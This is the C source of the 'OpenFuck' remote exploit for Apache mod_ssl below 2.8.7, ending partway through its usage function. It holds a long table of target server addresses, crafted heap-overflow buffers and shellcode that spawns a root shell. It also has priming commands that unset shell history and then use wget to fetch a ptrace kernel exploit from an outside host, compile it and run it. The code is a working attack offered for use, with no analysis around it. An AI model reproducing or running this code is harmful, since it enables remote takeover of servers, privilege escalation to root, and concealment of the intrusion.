apache mod_ssl < 2.8.7 openssl openfuckv2.c remote buffer overflow (2)

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apache mod_ssl < 2.8.7 openssl openfuckv2.c remote buffer overflow (2) Code Code...
/* * OF version r00t VERY PRIV8 spabam * Version: v3.0.4 * Requirements: libssl-dev ( apt-get install libssl-dev ) * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto * objdump -R /usr/sbin/httpd|grep free to get more targets * #hackarena irc.brasnet.org * Note: if required, host ptrace and replace wget target */ #include <arpa/inet.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <errno.h> #include <string.h> #include <stdio.h> #include <unistd.h> #include <openssl/ssl.h> #include <openssl/rsa.h> #include <openssl/x509.h> #include <openssl/evp.h> #include <openssl/rc4.h> #include <openssl/md5.h> #define SSL2_MT_ERROR 0 #define SSL2_MT_CLIENT_FINISHED 3 #define SSL2_MT_SERVER_HELLO 4 #define SSL2_MT_SERVER_VERIFY 5 #define SSL2_MT_SERVER_FINISHED 6 #define SSL2_MAX_CONNECTION_ID_LENGTH 16 /* update this if you add architectures */ #define MAX_ARCH 138 struct archs { char* desc; int func_addr; /* objdump -R /usr/sbin/httpd | grep free */ } architectures[] = { {"Caldera OpenLinux (apache-1.3.26)",0x080920e0}, {"Cobalt Sun 6.0 (apache-1.3.12)",0x8120f0c}, {"Cobalt Sun 6.0 (apache-1.3.20)",0x811dcb8}, {"Cobalt Sun x (apache-1.3.26)",0x8123ac3}, {"Cobalt Sun x Fixed2 (apache-1.3.26)",0x81233c3}, {"Conectiva 4 (apache-1.3.6)",0x08075398}, {"Conectiva 4.1 (apache-1.3.9)",0x0808f2fe}, {"Conectiva 6 (apache-1.3.14)",0x0809222c}, {"Conectiva 7 (apache-1.3.12)",0x0808f874}, {"Conectiva 7 (apache-1.3.19)",0x08088aa0}, {"Conectiva 7/8 (apache-1.3.26)",0x0808e628}, {"Conectiva 8 (apache-1.3.22)",0x0808b2d0}, {"Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",0x08095264}, {"Debian GNU Linux (apache_1.3.19-1)",0x080966fc}, {"Debian GNU Linux (apache_1.3.22-2)",0x08096aac}, {"Debian GNU Linux (apache-1.3.22-2.1)",0x08083828}, {"Debian GNU Linux (apache-1.3.22-5)",0x08083728}, {"Debian GNU Linux (apache_1.3.23-1)",0x08085de8}, {"Debian GNU Linux (apache_1.3.24-2.1)",0x08087d08}, {"Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",0x080873ac}, {"Debian GNU Linux (apache_1.3.24-3)",0x08087d68}, {"Debian GNU Linux (apache-1.3.26-1)",0x0080863c4}, {"Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",0x080863cc}, {"Debian GNU Linux (apache-1.3.27)",0x0080866a3}, {"FreeBSD (apache-1.3.9)", 0xbfbfde00}, {"FreeBSD (apache-1.3.11)",0x080a2ea8}, {"FreeBSD (apache-",0x080a7f58}, {"FreeBSD (apache-",0x080a0ec0}, {"FreeBSD (apache-",0x080a7e7c}, {"FreeBSD (apache-",0x080a7f18}, {"FreeBSD (apache-1.3.12)",0x0809bd7c}, {"FreeBSD (apache-1.3.14)", 0xbfbfdc00}, {"FreeBSD (apache-1.3.14)",0x080ab68c}, {"FreeBSD (apache-1.3.14)",0x0808c76c}, {"FreeBSD (apache-1.3.14)",0x080a3fc8}, {"FreeBSD (apache-1.3.14)",0x080ab6d8}, {"FreeBSD (apache-1.3.17_1)",0x0808820c}, {"FreeBSD (apache-1.3.19)", 0xbfbfdc00}, {"FreeBSD (apache-1.3.19_1)",0x0808c96c}, {"FreeBSD (apache-1.3.20)",0x0808cb70}, {"FreeBSD (apache-1.3.20)", 0xbfbfc000}, {"FreeBSD (apache-1.3.20+2.8.4)",0x0808faf8}, {"FreeBSD (apache-1.3.20_1)",0x0808dfb4}, {"FreeBSD (apache-1.3.22)", 0xbfbfc000}, {"FreeBSD (apache-1.3.22_7)",0x0808d110}, {"FreeBSD (apache_fp-1.3.23)",0x0807c5f8}, {"FreeBSD (apache-1.3.24_7)",0x0808f8b0}, {"FreeBSD (apache-1.3.24+2.8.8)",0x080927f8}, {"FreeBSD 4.6.2-Release-p6 (apache-1.3.26)",0x080c432c}, {"FreeBSD 4.6-Realease (apache-1.3.26)",0x0808fdec}, {"FreeBSD (apache-1.3.27)",0x080902e4}, {"Gentoo Linux (apache-1.3.24-r2)",0x08086c34}, {"Linux Generic (apache-1.3.14)",0xbffff500}, {"Mandrake Linux X.x (apache-1.3.22-10.1mdk)",0x080808ab}, {"Mandrake Linux 7.1 (apache-1.3.14-2)",0x0809f6c4}, {"Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",0x0809d233}, {"Mandrake Linux 7.2 (apache-1.3.14-2mdk)",0x0809f6ef}, {"Mandrake Linux 7.2 (apache-1.3.14) 2",0x0809d6c4}, {"Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",0x0809ccde}, {"Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",0x0809ce14}, {"Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",0x0809d262}, {"Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",0x08083545}, {"Mandrake Linux 8.0 (apache-1.3.19-3)",0x0809ea98}, {"Mandrake Linux 8.1 (apache-1.3.20-3)",0x0809e97c}, {"Mandrake Linux 8.2 (apache-1.3.23-4)",0x08086580}, {"Mandrake Linux 8.2 #2 (apache-1.3.23-4)",0x08086484}, {"Mandrake Linux 8.2 (apache-1.3.24)",0x08086665}, {"Mandrake Linux 9 (apache-1.3.26)",0x0808b864}, {"RedHat Linux ?.? GENERIC (apache-1.3.12-1)",0x0808c0f4}, {"RedHat Linux TEST1 (apache-1.3.12-1)",0x0808c0f4}, {"RedHat Linux TEST2 (apache-1.3.12-1)",0x0808c0f4}, {"RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",0x080d2c35}, {"RedHat Linux 4.2 (apache-1.1.3-3)",0x08065bae}, {"RedHat Linux 5.0 (apache-1.2.4-4)",0x0808c82c}, {"RedHat Linux 5.1-Update (apache-1.2.6)",0x08092a45}, {"RedHat Linux 5.1 (apache-1.2.6-4)",0x08092c2d}, {"RedHat Linux 5.2 (apache-1.3.3-1)",0x0806f049}, {"RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",0x0808e4d8}, {"RedHat Linux 6.0 (apache-1.3.6-7)",0x080707ec}, {"RedHat Linux 6.0 (apache-1.3.6-7)",0x080707f9}, {"RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",0x0808fd52}, {"RedHat Linux 6.0 Update (apache-1.3.24)",0x80acd58}, {"RedHat Linux 6.1 (apache-1.3.9-4)1",0x0808ccc4}, {"RedHat Linux 6.1 (apache-1.3.9-4)2",0x0808ccdc}, {"RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",0x0808fd5d}, {"RedHat Linux 6.1-fp2000 (apache-1.3.26)",0x082e6fcd}, {"RedHat Linux 6.2 (apache-1.3.12-2)1",0x0808f689}, {"RedHat Linux 6.2 (apache-1.3.12-2)2",0x0808f614}, {"RedHat Linux 6.2 mod(apache-1.3.12-2)3",0xbffff94c}, {"RedHat Linux 6.2 update (apache-1.3.22-5.6)1",0x0808f9ec}, {"RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",0x0808f9d4}, {"Redhat Linux 7.x (apache-1.3.22)",0x0808400c}, {"RedHat Linux 7.x (apache-1.3.26-1)",0x080873bc}, {"RedHat Linux 7.x (apache-1.3.27)",0x08087221}, {"RedHat Linux 7.0 (apache-1.3.12-25)1",0x0809251c}, {"RedHat Linux 7.0 (apache-1.3.12-25)2",0x0809252d}, {"RedHat Linux 7.0 (apache-1.3.14-2)",0x08092b98}, {"RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",0x08084358}, {"RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",0x0808438c}, {"RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",0x08086e41}, {"RedHat Linux 7.1 (apache-1.3.19-5)1",0x0809af8c}, {"RedHat Linux 7.1 (apache-1.3.19-5)2",0x0809afd9}, {"RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",0x0808438c}, {"RedHat Linux 7.1-Update (1.3.22-5.7.1)",0x08084389}, {"RedHat Linux 7.1 (apache-1.3.22-src)",0x0816021c}, {"RedHat Linux 7.1-Update (1.3.27-1.7.1)",0x08086ec89}, {"RedHat Linux 7.2 (apache-1.3.20-16)1",0x080994e5}, {"RedHat Linux 7.2 (apache-1.3.20-16)2",0x080994d4}, {"RedHat Linux 7.2-Update (apache-1.3.22-6)",0x08084045}, {"RedHat Linux 7.2 (apache-1.3.24)",0x80b0938}, {"RedHat Linux 7.2 (apache-1.3.26)",0x08161c16}, {"RedHat Linux 7.2 (apache-1.3.26-snc)",0x8161c14}, {"Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",0x08269950}, {"Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",0x08269988}, {"RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",0x08086af9}, {"RedHat Linux 7.3 (apache-1.3.23-11)1",0x0808528c}, {"RedHat Linux 7.3 (apache-1.3.23-11)2",0x0808525f}, {"RedHat Linux 7.3 (apache-1.3.27)",0x080862e4}, {"RedHat Linux 8.0 (apache-1.3.27)",0x08084c1c}, {"RedHat Linux 8.0-second (apache-1.3.27)",0x0808151e}, {"RedHat Linux 8.0 (apache-2.0.40)",0x08092fa4}, {"Slackware Linux 4.0 (apache-1.3.6)",0x08088130}, {"Slackware Linux 7.0 (apache-1.3.9)",0x080a7fc0}, {"Slackware Linux 7.0 (apache-1.3.26)",0x083d37fc}, {"Slackware 7.0 (apache-1.3.26)2",0x083d2232}, {"Slackware Linux 7.1 (apache-1.3.12)",0x080a86a4}, {"Slackware Linux 8.0 (apache-1.3.20)",0x080ae67c}, {"Slackware Linux 8.1 (apache-1.3.24)",0x080b0c60}, {"Slackware Linux 8.1 (apache-1.3.26)",0x080b2100}, {"Slackware Linux 8.1-stable (apache-1.3.26)",0x080b0c60}, {"Slackware Linux (apache-1.3.27)",0x080b1a3a}, {"SuSE Linux 7.0 (apache-1.3.12)",0x0809f54c}, {"SuSE Linux 7.1 (apache-1.3.17)",0x08099984}, {"SuSE Linux 7.2 (apache-1.3.19)",0x08099ec8}, {"SuSE Linux 7.3 (apache-1.3.20)",0x08099da8}, {"SuSE Linux 8.0 (apache-1.3.23)",0x08086168}, {"SUSE Linux 8.0 (apache-1.3.23-120)",0x080861c8}, {"SuSE Linux 8.0 (apache-1.3.23-137)",0x080861c8}, /* this one unchecked cause require differend shellcode */ {"Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",0xfd42630}, }; extern int errno; int cipher; int ciphers; /* the offset of the local port from be beginning of the overwrite next chunk buffer */ #define FINDSCKPORTOFS 208 + 12 + 46 unsigned char overwrite_session_id_length[] = "AAAA" /* int master key length; */ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */ "\x70\x00\x00\x00"; /* unsigned int session id length; */ unsigned char overwrite_next_chunk[] = "AAAA" /* int master key length; */ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */ "AAAA" /* unsigned int session id length; */ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */ "AAAA" /* unsigned int sid ctx length; */ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */ "AAAA" /* int not resumable; */ "\x00\x00\x00\x00" /* struct sess cert st *sess cert; */ "\x00\x00\x00\x00" /* X509 *peer; */ "AAAA" /* long verify result; */ "\x01\x00\x00\x00" /* int references; */ "AAAA" /* int timeout; */ "AAAA" /* int time */ "AAAA" /* int compress meth; */ "\x00\x00\x00\x00" /* SSL CIPHER *cipher; */ "AAAA" /* unsigned long cipher id; */ "\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */ "\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */ "AAAAAAAA" /* struct ssl session st *prev,*next; */ "\x00\x00\x00\x00" /* Size of previous chunk */ "\x11\x00\x00\x00" /* Size of chunk, in bytes */ "fdfd" /* Forward and back pointers */ "bkbk" "\x10\x00\x00\x00" /* Size of previous chunk */ "\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */ /* shellcode start */ "\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */ "\x90\x90\x90\x90" "\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */ /* 72 bytes findsckcode by LSD-pl */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xe7" /* movl %esp,%edi */ "\x8d\x77\x10" /* leal 0x10(%edi),%esi */ "\x89\x77\x04" /* movl %esi,0x4(%edi) */ "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */ "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */ "\xb3\x10" /* movb $0x10,%bl */ "\x89\x19" /* movl %ebx,(%ecx) */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\xff" /* movb $0xff,%cl */ "\x89\x0f" /* movl %ecx,(%edi) */ "\x51" /* pushl %ecx */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x07" /* movb $0x07,%bl */ "\x89\xf9" /* movl %edi,%ecx */ "\xcd\x80" /* int $0x80 */ "\x59" /* popl %ecx */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x39\xd8" /* cmpl %ebx,%eax */ "\x75\x0a" /* jne <findsckcode+54> */ "\x66\xb8\x12\x34" /* movw $0x1234,%bx */ "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */ "\x74\x02" /* je <findsckcode+56> */ "\xe2\xe0" /* loop <findsckcode+24> */ "\x89\xcb" /* movl %ecx,%ebx */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\x03" /* movb $0x03,%cl */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x3f" /* movb $0x3f,%al */ "\x49" /* decl %ecx */ "\xcd\x80" /* int $0x80 */ "\x41" /* incl %ecx */ "\xe2\xf6" /* loop <findsckcode+62> */ /* 10 byte setresuid(0,0,0); by core */ "\x31\xc9" /* xor %ecx,%ecx */ "\xf7\xe1" /* mul %ecx,%eax */ "\x51" /* push %ecx */ "\x5b" /* pop %ebx */ "\xb0\xa4" /* mov $0xa4,%al */ "\xcd\x80" /* int $0x80 */ /* bigger shellcode added by spabam */ /* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69" "\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80" */ /* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80"; /* int $0x80 */ /* read and write buffer*/ #define BUFSIZE 16384 /* hardcoded protocol stuff */ #define CHALLENGE_LENGTH 16 #define RC4_KEY_LENGTH 16 /* 128 bits */ #define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2) /* straight from the openssl source */ #define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2) #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2) /* we keep all SSL2 state in this structure */ typedef struct { int sock; /* client stuff */ unsigned char challenge[CHALLENGE_LENGTH]; unsigned char master_key[RC4_KEY_LENGTH]; unsigned char key_material[RC4_KEY_MATERIAL_LENGTH]; /* connection id - returned by the server */ int conn_id_length; unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH]; /* server certificate */ X509 *x509; /* session keys */ unsigned char* read_key; unsigned char* write_key; RC4_KEY* rc4_read_key; RC4_KEY* rc4_write_key; /* sequence numbers, used for MAC calculation */ int read_seq; int write_seq; /* set to 1 when the SSL2 handshake is complete */ int encrypted; } ssl_conn; #define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n" #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n" long getip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { perror("gethostbyname()"); exit(-1); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } /* mixter's code w/enhancements by core */ int sh(int sockfd) { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; /* Priming commands */ strcpy(snd, COMMAND1 "\n"); write(sockfd, snd, strlen(snd)); strcpy(snd, COMMAND2 "\n"); write(sockfd, snd, strlen(snd)); /* Main command loop */ for (;;) { FD_SET(fileno(stdin), &rset); FD_SET(sockfd, &rset); maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd)-2, stdin); write(sockfd, snd, strlen(snd)); } if (FD_ISSET(sockfd, &rset)) { bzero(rcv, sizeof(rcv)); if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) { printf("Good Bye!\n"); return 0; } if (n < 0) { perror("read"); return 1; } fputs(rcv, stdout); fflush(stdout); /* keeps output nice */ } } /* for(;;) */ } /* Returns the local port of a connected socket */ int get_local_port(int sock) { struct sockaddr_in s_in; unsigned int namelen = sizeof(s_in); if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) { printf("Can't get local port: %s\n", strerror(errno)); exit(1); } return s_in.sin_port; } /* Connect to a host */ int connect_host(char* host, int port) { struct sockaddr_in s_in; int sock; s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = getip(host); s_in.sin_port = htons(port); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) { printf("Could not create a socket\n"); exit(1); } if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) { printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno)); exit(1); } return sock; } /* Create a new ssl conn structure and connect to a host */ ssl_conn* ssl_connect_host(char* host, int port) { ssl_conn* ssl; if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) { printf("Can't allocate memory\n"); exit(1); } /* Initialize some values */ ssl->encrypted = 0; ssl->write_seq = 0; ssl->read_seq = 0; ssl->sock = connect_host(host, port); return ssl; } /* global buffer used by the ssl result() */ char res_buf[30]; /* converts an SSL error code to a string */ char* ssl_error(int code) { switch (code) { case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)"; case 0x01: return "SSL2 PE NO CIPHER (0x01)"; case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)"; case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)"; case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)"; default: sprintf(res_buf, "%02x", code); return res_buf; } } /* read len bytes from a socket. boring. */ int read_data(int sock, unsigned char* buf, int len) { int l; int to_read = len; do { if ((l = read(sock, buf, to_read)) < 0) { printf("Error in read: %s\n", strerror(errno)); exit(1); } to_read -= len; } while (to_read > 0); return len; } /* reads an SSL packet and decrypts it if necessery */ int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size) { int rec_len, padding; read_data(ssl->sock, buf, 2); if ((buf[0] & 0x80) == 0) { /* three byte header */ rec_len = ((buf[0] & 0x3f) << 8) | buf[1]; read_data(ssl->sock, &buf[2], 1); padding = (int)buf[2]; } else { /* two byte header */ rec_len = ((buf[0] & 0x7f) << 8) | buf[1]; padding = 0; } if ((rec_len <= 0) || (rec_len > buf_size)) { printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); exit(1); } read_data(ssl->sock, buf, rec_len); if (ssl->encrypted) { if (MD5_DIGEST_LENGTH + padding >= rec_len) { if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) { /* the server didn't switch to encryption due to an error */ return 0; } else { printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len); exit(1); } } /* decrypt the encrypted part of the packet */ RC4(ssl->rc4_read_key, rec_len, buf, buf); /* move the decrypted message in the beginning of the buffer */ rec_len = rec_len - MD5_DIGEST_LENGTH - padding; memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len); } if (buf[0] == SSL2_MT_ERROR) { if (rec_len != 3) { printf("Malformed server error message\n"); exit(1); } else { return 0; } } return rec_len; } /* send an ssl packet, encrypting it if ssl->encrypted is set */ void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len) { unsigned char buf[BUFSIZE]; unsigned char* p; int tot_len; MD5_CTX ctx; int seq; if (ssl->encrypted) tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */ else tot_len = rec_len; if (2 + tot_len > BUFSIZE) { printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); exit(1); } p = buf; s2n(tot_len, p); buf[0] = buf[0] | 0x80; /* two byte header */ if (ssl->encrypted) { /* calculate the MAC */ seq = ntohl(ssl->write_seq); MD5_Init(&ctx); MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH); MD5_Update(&ctx, rec, rec_len); MD5_Update(&ctx, &seq, 4); MD5_Final(p, &ctx); p+=MD5_DIGEST_LENGTH; memcpy(p, rec, rec_len); /* encrypt the payload */ RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]); } else { memcpy(p, rec, rec_len); } send(ssl->sock, buf, 2 + tot_len, 0); /* the sequence number is incremented by both encrypted and plaintext packets */ ssl->write_seq++; } /* Send a CLIENT HELLO message to the server */ void send_client_hello(ssl_conn *ssl) { int i; unsigned char buf[BUFSIZE] = "\x01" /* client hello msg */ "\x00\x02" /* client version */ "\x00\x18" /* cipher specs length */ "\x00\x00" /* session id length */ "\x00\x10" /* challenge length */ "\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */ "\x80\x01\x00\x80\x08\x00\x80\x06" "\x00\x40\x04\x00\x80\x02\x00\x80" ""; /* session id data */ /* generate CHALLENGE LENGTH bytes of challenge data */ for (i = 0; i < CHALLENGE_LENGTH; i++) { ssl->challenge[i] = (unsigned char) (rand() >> 24); } memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH); send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH); } /* Get a SERVER HELLO response from the server */ void get_server_hello(ssl_conn* ssl) { unsigned char buf[BUFSIZE]; const unsigned char *p, *end; int len; int server_version, cert_length, cs_length, conn_id_length; int found; if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); exit(1); } if (len < 11) { printf("get_server_hello: Packet too short (len = %d)\n", len); exit(1); } p = buf; if (*(p++) != SSL2_MT_SERVER_HELLO) { printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]); exit(1); } if (*(p++) != 0) { printf("get_server_hello: SESSION-ID-HIT is not 0\n"); exit(1); } if (*(p++) != 1) { printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n"); exit(1); } n2s(p, server_version); if (server_version != 2) { printf("get_server_hello: Unsupported server version %d\n", server_version); exit(1); } n2s(p, cert_length); n2s(p, cs_length); n2s(p, conn_id_length); if (len != 11 + cert_length + cs_length + conn_id_length) { printf("get_server_hello: Malformed packet size\n"); exit(1); } /* read the server certificate */ ssl->x509 = NULL; ssl->x509=d2i_X509(NULL,&p,(long)cert_length); if (ssl->x509 == NULL) { printf("get server hello: Cannot parse x509 certificate\n"); exit(1); } if (cs_length % 3 != 0) { printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n"); exit(1); } found = 0; for (end=p+cs_length; p < end; p += 3) { if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80)) found = 1; /* SSL CK RC4 128 WITH MD5 */ } if (!found) { printf("get server hello: Remote server does not support 128 bit RC4\n"); exit(1); } if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) { printf("get server hello: CONNECTION-ID-LENGTH is too long\n"); exit(1); } /* The connection id is sent back to the server in the CLIENT FINISHED packet */ ssl->conn_id_length = conn_id_length; memcpy(ssl->conn_id, p, conn_id_length); } /* Send a CLIENT MASTER KEY message to the server */ void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) { int encrypted_key_length, key_arg_length, record_length; unsigned char* p; int i; EVP_PKEY *pkey=NULL; unsigned char buf[BUFSIZE] = "\x02" /* client master key message */ "\x01\x00\x80" /* cipher kind */ "\x00\x00" /* clear key length */ "\x00\x40" /* encrypted key length */ "\x00\x08"; /* key arg length */ p = &buf[10]; /* generate a 128 byte master key */ for (i = 0; i < RC4_KEY_LENGTH; i++) { ssl->master_key[i] = (unsigned char) (rand() >> 24); } pkey=X509_get_pubkey(ssl->x509); if (!pkey) { printf("send client master key: No public key in the server certificate\n"); exit(1); } if (EVP_PKEY_get1_RSA(pkey) == NULL) { printf("send client master key: The public key in the server certificate is not a RSA key\n"); exit(1); } /* Encrypt the client master key with the server public key and put it in the packet */ encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING); if (encrypted_key_length <= 0) { printf("send client master key: RSA encryption failure\n"); exit(1); } p += encrypted_key_length; if (key_arg_overwrite) { /* These 8 bytes fill the key arg array on the server */ for (i = 0; i < 8; i++) { *(p++) = (unsigned char) (rand() >> 24); } /* This overwrites the data following the key arg array */ memcpy(p, key_arg_overwrite, key_arg_overwrite_len); key_arg_length = 8 + key_arg_overwrite_len; } else { key_arg_length = 0; /* RC4 doesn't use KEY-ARG */ } p = &buf[6]; s2n(encrypted_key_length, p); s2n(key_arg_length, p); record_length = 10 + encrypted_key_length + key_arg_length; send_ssl_packet(ssl, buf, record_length); ssl->encrypted = 1; } void generate_key_material(ssl_conn* ssl) { unsigned int i; MD5_CTX ctx; unsigned char *km; unsigned char c='0'; km=ssl->key_material; for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) { MD5_Init(&ctx); MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH); MD5_Update(&ctx,&c,1); c++; MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH); MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length); MD5_Final(km,&ctx); km+=MD5_DIGEST_LENGTH; } } void generate_session_keys(ssl_conn* ssl) { generate_key_material(ssl); ssl->read_key = &(ssl->key_material[0]); ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY)); RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key); ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]); ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY)); RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key); } void get_server_verify(ssl_conn* ssl) { unsigned char buf[BUFSIZE]; int len; if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); exit(1); } if (len != 1 + CHALLENGE_LENGTH) { printf("get server verify: Malformed packet size\n"); exit(1); } if (buf[0] != SSL2_MT_SERVER_VERIFY) { printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]); exit(1); } if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) { printf("get server verify: Challenge strings don't match\n"); exit(1); } } void send_client_finished(ssl_conn* ssl) { unsigned char buf[BUFSIZE]; buf[0] = SSL2_MT_CLIENT_FINISHED; memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length); send_ssl_packet(ssl, buf, 1+ssl->conn_id_length); } void get_server_finished(ssl_conn* ssl) { unsigned char buf[BUFSIZE]; int len; int i; if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); exit(1); } if (buf[0] != SSL2_MT_SERVER_FINISHED) { printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]); exit(1); } if (len <= 112 /*17*/) { printf("This server is not vulnerable to this attack.\n"); exit(1); } cipher = *(int*)&buf[101]; ciphers = *(int*)&buf[109]; printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers); } void get_server_error(ssl_conn* ssl) { unsigned char buf[BUFSIZE]; int len; if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) { printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]); exit(1); } } void usage(char* argv0) { int i; printf(": Usage: %s target box [port] [-c N]\n\n", argv0); printf(" target - supported box eg: 0x00\n"); printf(" box - hostname or IP address\n"); printf(" port - port for 